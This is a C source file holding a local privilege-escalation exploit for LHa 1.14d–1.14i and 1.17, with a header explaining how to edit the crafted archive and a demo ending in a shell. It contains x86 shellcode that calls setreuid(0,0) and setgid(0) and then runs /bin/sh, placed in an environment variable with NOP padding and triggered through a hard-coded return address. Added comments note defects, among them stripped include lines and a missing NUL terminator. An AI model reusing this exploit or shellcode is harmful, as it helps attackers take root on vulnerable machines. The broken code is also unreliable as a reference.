/* Author : N4rK07IX narkotix@linuxmail.org Bug Found By : Ulf Ha"rnhammar LHa buffer overflows and directory traversal problems PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i // Theze sectionz completely taken from full-disclosure :)) 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied Patch : Ulf Ha"rnhammar made some patch U can find it on : LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ --------------------------------------------------------------- Little Explanation about Exploit : Copy the attached overflow.lha file to your directory , i.e /home Then open overflow.lha with text editor(vim is better), U will see there four bytes ŭ˙ż at the end of the line, just delete ŭ˙ż and paste your ASCII RET address there,but make sure not to malform the file.Then run the sploit. Note : overflow.lha file is completely taken from Ulf's post. Demo: addicted@labs:~/c-hell$ ./lha /home/addicted/overflow.lha -------------------------------------------------- | Author : N4rK07IX | narkotix@linuxmail.org |-------------------------------------------------- [+] RET ADDRESS = 0xbffffd90 [!] Paste These ASCII 4 bytes Ret Adress to the XXXX in the file overflow.lha [!] ASCII RET ADDR = ŭ˙ż [+] Exploiting the buffer.. 
LHa: Error: Unknown information UUUU[... long run of 'U' padding bytes, as in the author's demo output ...]UAAAAAAAŭ˙żB sh-2.05b$ Gretingz: Efnet,mathmonkey,Uz4yh4N,laplace_ex,xmlguy,gotcha,forkbomb */

/*
 * Proof-of-concept listing for the LHa stack overflow described in the header
 * comment above.  Kept for reference only: it relies on a fixed, non-randomized
 * 32-bit stack address (see `ret` in main()) and, as extracted here, does not
 * compile because the three #include directives below carry no header name.
 * Known defects are noted inline rather than fixed.
 */
/* Header names were lost in extraction (angle-bracketed names stripped); the code
 * uses printf/exit/memset/memcpy/strlen/putenv/perror/execl, so the original
 * presumably named the corresponding standard headers - TODO confirm. */
#include
#include
#include
#define BUFFERSIZE 2000       /* size of the local `buffer` that main() fills with `ret` */
#define FEED 600              /* size of the "ADDICT=" environment string built in main() */
#define PATH "/usr/bin/lha"   /* path passed to execl() as the program to run */
#define PROG "lha"            /* argv[0] handed to that program */

/* x86 Linux payload.  The author's per-instruction comments are kept as written. */
static char shellcode[] = //* setreuid(0,0);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\xcd\x80" // int $0x80
/* setgid(0); */
"\x31\xdb" // xor %ebx,%ebx
"\x89\xd8" // mov %ebx,%eax
"\xb0\x2e" // mov $0x2e,%al
"\xcd\x80" // int $0x80
// execve /bin/sh
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
// exit();
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80

/*
 * Entry point.
 *
 * argv[1] is the path of the crafted archive; it is passed to lha unchanged.
 * Builds the ADDICT= environment string, computes and prints `ret`, then
 * replaces this process with lha via execl().  Returns 0 only when execl()
 * fails, since on success it does not return.  Exits with -1 when argv[1]
 * is missing.
 */
int main(int argc, char *argv[]) {
    if( argc < 2 ) {
        printf("[-] Enter The Full Of the overflow.lha \n");
        exit(-1);
    }
    printf("--------------------------------------------------\n");
    printf("| Author : N4rK07IX\n");
    printf("| Found by : Ulf Ha'rnhammar\n");
    printf("| LHa 1.14d 1.14i 1.17 Local Lame Stack Overflow Sploit\n");
    printf("| narkotix@linuxmail.org\n");
    printf("|--------------------------------------------------\n");
    char buffer[BUFFERSIZE];
    char addict[FEED];
    int i, *adr_pointer, *addict_pointer;   /* addict_pointer is declared but never used */
    /* Fill addict with 0x90 and copy the payload to its tail.  strlen() bytes are
     * copied, so the payload's terminating NUL is not; after the three calls below
     * addict contains no '\0' at all. */
    memset(addict,0x90,sizeof(addict));
    memcpy(&addict[FEED-strlen(shellcode)],shellcode,strlen(shellcode));
    memcpy(addict,"ADDICT=",7);
    /* putenv() and strlen(addict) below both expect a NUL-terminated string; none
     * was written, so both read past the end of the 600-byte array (undefined
     * behavior).  The string is also handed to putenv() directly, so the
     * environment entry aliases this stack array. */
    putenv(addict);
    /* Hard-coded top-of-stack constant: assumes a fixed, non-randomized 32-bit
     * stack layout, which is presumably why the header lists only specific
     * versions/platforms; on a system with stack randomization the value has
     * no meaning. */
    unsigned long ret = 0XBFFFFFFA -strlen("/usr/bin/lha") - strlen(addict);
    /* %x with an unsigned long argument: format/argument mismatch (%lx expected). */
    printf("[+] RET ADDRESS = 0x%x\n",ret);
    /* Split ret into its four bytes, least significant byte first. */
    char l = (ret & 0x000000ff);
    char a = (ret & 0x0000ff00) >> 8;
    char m = (ret & 0x00ff0000) >> 16;
    char e = (ret & 0xff000000) >> 24;
    printf("[!] Paste These ASCII 4 bytes Ret Adress to the XXXX in the file overflow.lha\n");
    printf("[!] ASCII RET ADDR = %c%c%c%c\n",l,a,m,e);
    printf("[+] Exploiting the buffer..\n");
    /* Fill the local buffer with ret, four bytes at a time.  buffer is never
     * passed to execl() or used afterwards, so this loop has no effect on the
     * process that gets exec'd. */
    adr_pointer = (int *)(buffer);
    for(i = 0 ; i < BUFFERSIZE ; i += 4) *adr_pointer++ = ret;
    /* Replaces this process image; execl() only returns if it fails. */
    execl(PATH,PROG,"x",argv[1],NULL);
    /* No-op: this tests the address of the execl function (never null), not its
     * result, and the trailing ';' gives the if an empty body.  perror() therefore
     * always runs once execl() has returned. */
    if(!execl);
    perror("execl()");
    printf("[+] Done B4by\n");
    return 0;
}